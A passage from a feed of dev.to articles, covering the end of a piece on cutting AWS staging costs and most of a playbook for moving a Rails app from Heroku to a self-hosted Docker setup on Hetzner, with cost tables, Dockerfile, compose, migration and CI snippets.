  &lt;span class="na"&gt;staging&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy ephemeral staging&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;docker compose -f docker-compose.staging.yml up -d&lt;/span&gt;
          &lt;span class="s"&gt;echo "Staging URL: https://pr-${{ github.event.number }}.staging.example.com"&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run E2E tests&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm run test:e2e -- --base-url https://pr-${{ github.event.number }}.staging.example.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Cost:&lt;/strong&gt; Only pay when PRs are open. No PR, no staging, no cost.&lt;/p&gt;

&lt;h2&gt;
  
  
  Combined Savings
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Fix&lt;/th&gt;
&lt;th&gt;Savings&lt;/th&gt;
&lt;th&gt;Effort&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Schedule-based shutdown&lt;/td&gt;
&lt;td&gt;65%&lt;/td&gt;
&lt;td&gt;30 minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Right-size instances&lt;/td&gt;
&lt;td&gt;50-70% on remaining&lt;/td&gt;
&lt;td&gt;1 hour&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Combined&lt;/td&gt;
&lt;td&gt;~90%&lt;/td&gt;
&lt;td&gt;1.5 hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ephemeral (advanced)&lt;/td&gt;
&lt;td&gt;95%+&lt;/td&gt;
&lt;td&gt;Half day&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For our client: $1,775/mo → $180/mo. &lt;strong&gt;90% reduction. 90 minutes of work.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Meta-Problem: Nobody Owns Staging Costs
&lt;/h2&gt;

&lt;p&gt;This happens because:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Dev team provisions staging&lt;/strong&gt; — optimized for "works like prod"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Finance sees one "AWS" line item&lt;/strong&gt; — doesn't break down by environment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Nobody reviews staging specifically&lt;/strong&gt; — it's invisible&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Fix the process:&lt;/strong&gt; Add environment tags to every AWS resource. Set up a Cost Explorer view that splits by environment. Review monthly.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Tag all staging resources&lt;/span&gt;
aws ec2 create-tags &lt;span class="nt"&gt;--resources&lt;/span&gt; i-xxxxx &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tags&lt;/span&gt; &lt;span class="nv"&gt;Key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Environment,Value&lt;span class="o"&gt;=&lt;/span&gt;staging
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then in Cost Explorer, group by the &lt;code&gt;Environment&lt;/code&gt; tag. You'll immediately see the problem.&lt;/p&gt;
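&lt;p&gt;With tags in place, the per-environment split is one query away:&lt;/p&gt;

```shell
# Last 30 days of spend, split by the Environment tag
aws ce get-cost-and-usage \
  --time-period Start=$(date -d '30 days ago' +%Y-%m-%d),End=$(date +%Y-%m-%d) \
  --granularity MONTHLY \
  --metrics "UnblendedCost" \
  --group-by Type=TAG,Key=Environment
```

&lt;p&gt;Note: the &lt;code&gt;Environment&lt;/code&gt; tag must first be activated as a cost allocation tag in the Billing console, and it only accrues data from activation onward.&lt;/p&gt;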

&lt;h2&gt;
  
  
  Free Environment Audit
&lt;/h2&gt;

&lt;p&gt;We'll review your AWS environments (prod, staging, dev) and show you exactly where the waste is. 15 minutes, free, no pitch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a slot:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:09 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/complete-paas-exit-playbook-heroku-to-self-hosted-in-72-hours-5egf</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/complete-paas-exit-playbook-heroku-to-self-hosted-in-72-hours-5egf</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/paas-exit-heroku-to-self-hosted-72-hours" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/paas-exit-heroku-to-self-hosted-72-hours?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=paas-exit-heroku-to-self-hosted-72-hours" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Complete PaaS Exit Playbook: Heroku to Self-Hosted in 72 Hours
&lt;/h1&gt;

&lt;p&gt;We've migrated 6 startups off Heroku and Render in the past year. Average cost reduction: 87%. No client has gone back.&lt;/p&gt;

&lt;p&gt;This is the exact playbook we use. Three days, start to finish.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Economics That Force the Move
&lt;/h2&gt;

&lt;p&gt;Here's a real client breakdown (Series A, Rails app, ~5K DAU):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Heroku Item&lt;/th&gt;
&lt;th&gt;Monthly Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;4× Performance-M Dynos&lt;/td&gt;
&lt;td&gt;$1,000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Postgres (Standard-0)&lt;/td&gt;
&lt;td&gt;$50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Redis (Premium-0)&lt;/td&gt;
&lt;td&gt;$200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku Data for Redis&lt;/td&gt;
&lt;td&gt;$200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Papertrail (logging)&lt;/td&gt;
&lt;td&gt;$230&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scout APM&lt;/td&gt;
&lt;td&gt;$120&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heroku CI&lt;/td&gt;
&lt;td&gt;$100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSL, Scheduler, misc add-ons&lt;/td&gt;
&lt;td&gt;$900&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$2,800/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The replacement:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Self-Hosted Item&lt;/th&gt;
&lt;th&gt;Monthly Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner CX41 (16GB RAM, 4 vCPU)&lt;/td&gt;
&lt;td&gt;$15&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner managed Postgres&lt;/td&gt;
&lt;td&gt;$25&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backblaze B2 backups&lt;/td&gt;
&lt;td&gt;$5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain + DNS (Cloudflare free)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring (Grafana + Prometheus, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD (Gitea Actions, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Uptime monitoring (Uptime Kuma, self-hosted)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$45/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The actual client paid $240/mo because they chose a larger managed Postgres plan and a beefier server for headroom. Still 91% savings.&lt;/p&gt;
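&lt;p&gt;Before Day 1, capture the app's current config so nothing is lost in translation. The Heroku CLI can emit it in shell format (&lt;code&gt;your-app-name&lt;/code&gt; is a placeholder):&lt;/p&gt;

```shell
# Export all Heroku config vars as KEY=value lines for the new host's .env
heroku config --shell --app your-app-name > .env.production

# Keep the secrets out of git
echo '.env.production' >> .gitignore
```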

&lt;h2&gt;
  
  
  Day 1: Containerize (8 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Create a Dockerfile
&lt;/h3&gt;

&lt;p&gt;If you're on Heroku, you likely have a &lt;code&gt;Procfile&lt;/code&gt;. The translation is direct:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Heroku Procfile: web: bundle exec puma -C config/puma.rb&lt;/span&gt;
&lt;span class="c"&gt;# Docker equivalent:&lt;/span&gt;

&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;ruby:3.2-slim&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="c"&gt;# Install dependencies&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  build-essential libpq-dev nodejs npm &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; Gemfile Gemfile.lock ./&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;bundle &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--deployment&lt;/span&gt; &lt;span class="nt"&gt;--without&lt;/span&gt; development &lt;span class="nb"&gt;test&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; . .&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;bundle &lt;span class="nb"&gt;exec &lt;/span&gt;rake assets:precompile

&lt;span class="c"&gt;# Production stage&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ruby:3.2-slim&lt;/span&gt;
&lt;span class="k"&gt;WORKDIR&lt;/span&gt;&lt;span class="s"&gt; /app&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; libpq-dev &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="se"&gt;\
&lt;/span&gt;  &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /var/lib/apt/lists/&lt;span class="k"&gt;*&lt;/span&gt;

&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=base /app /app&lt;/span&gt;

&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; 1000:1000&lt;/span&gt;
&lt;span class="k"&gt;EXPOSE&lt;/span&gt;&lt;span class="s"&gt; 3000&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["bundle", "exec", "puma", "-C", "config/puma.rb"]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Create docker-compose.yml
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:3000:3000"&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;DATABASE_URL=postgres://app:${DB_PASS}@postgres:5432/app_prod&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;REDIS_URL=redis://redis:6379/0&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;RAILS_ENV=production&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;SECRET_KEY_BASE=${SECRET_KEY}&lt;/span&gt;
    &lt;span class="na"&gt;depends_on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;redis&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;2.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16-alpine&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;999:999"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;pgdata:/var/lib/postgresql/data&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;POSTGRES_PASSWORD=${DB_PASS}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;POSTGRES_DB=app_prod&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;redis&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;redis:7-alpine&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;redisdata:/data&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256M&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;443:443"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;80:80"&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock:/var/run/docker.sock:ro&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;./traefik:/etc/traefik&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;

&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pgdata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;redisdata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;

&lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;backend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Test locally
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose up &lt;span class="nt"&gt;--build&lt;/span&gt;
&lt;span class="c"&gt;# Hit localhost:3000, verify everything works&lt;/span&gt;
&lt;span class="c"&gt;# Run your test suite against Docker&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Day 2: Provision and Migrate Data (8 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Provision the server
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Hetzner CLI (or use their web UI)&lt;/span&gt;
hcloud server create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; prod-01 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--type&lt;/span&gt; cx41 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt; ubuntu-24.04 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--ssh-key&lt;/span&gt; my-key &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; nbg1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Bootstrap the server
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# SSH in and run&lt;/span&gt;
apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
apt &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; docker.io docker-compose-v2
systemctl &lt;span class="nb"&gt;enable &lt;/span&gt;docker

&lt;span class="c"&gt;# Create deploy user&lt;/span&gt;
useradd &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; /bin/bash deploy
usermod &lt;span class="nt"&gt;-aG&lt;/span&gt; docker deploy

&lt;span class="c"&gt;# Set up firewall&lt;/span&gt;
ufw allow 22/tcp
ufw allow 80/tcp
ufw allow 443/tcp
ufw &lt;span class="nb"&gt;enable&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Migrate the database
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Export from Heroku&lt;/span&gt;
heroku pg:backups:capture &lt;span class="nt"&gt;--app&lt;/span&gt; your-app
heroku pg:backups:download &lt;span class="nt"&gt;--app&lt;/span&gt; your-app

&lt;span class="c"&gt;# Import to new Postgres&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt; postgres
docker compose &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-T&lt;/span&gt; postgres pg_restore &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-U&lt;/span&gt; postgres &lt;span class="nt"&gt;-d&lt;/span&gt; app_prod &lt;span class="nt"&gt;--no-owner&lt;/span&gt; &lt;span class="nt"&gt;--no-acl&lt;/span&gt; &amp;lt; latest.dump
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Migrate files/assets
&lt;/h3&gt;

&lt;p&gt;Heroku's filesystem is ephemeral, so if your app serves uploads you're almost certainly on S3 already. Nothing moves; just update the credentials in the new server's env.&lt;/p&gt;

&lt;p&gt;If you were writing files to the dyno's local disk, that data was wiped on every deploy anyway. Nothing to migrate.&lt;/p&gt;
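&lt;p&gt;Updating the credentials can be as simple as regenerating the &lt;code&gt;.env&lt;/code&gt; file that &lt;code&gt;docker compose&lt;/code&gt; reads on the new server. A minimal sketch (every value below is a placeholder to substitute):&lt;/p&gt;

```shell
# Sketch: regenerate the env file docker compose reads (placeholder values).
cat > .env <<'EOF'
DB_PASS=change-me
SECRET_KEY=change-me
AWS_ACCESS_KEY_ID=change-me
AWS_SECRET_ACCESS_KEY=change-me
EOF
chmod 600 .env   # secrets should not be world-readable
wc -l < .env     # quick sanity check: 4 entries
```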

&lt;h2&gt;
  
  
  Day 3: Go Live (4 hours)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Deploy and verify
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# On the server&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;
docker compose logs &lt;span class="nt"&gt;-f&lt;/span&gt; app  &lt;span class="c"&gt;# Watch for startup errors&lt;/span&gt;

&lt;span class="c"&gt;# Health check&lt;/span&gt;
curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://your-domain.com/health | jq &lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Set up CI/CD
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .gitea/workflows/deploy.yml (or .github/workflows)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;branches&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;main&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deploy&lt;/span&gt;
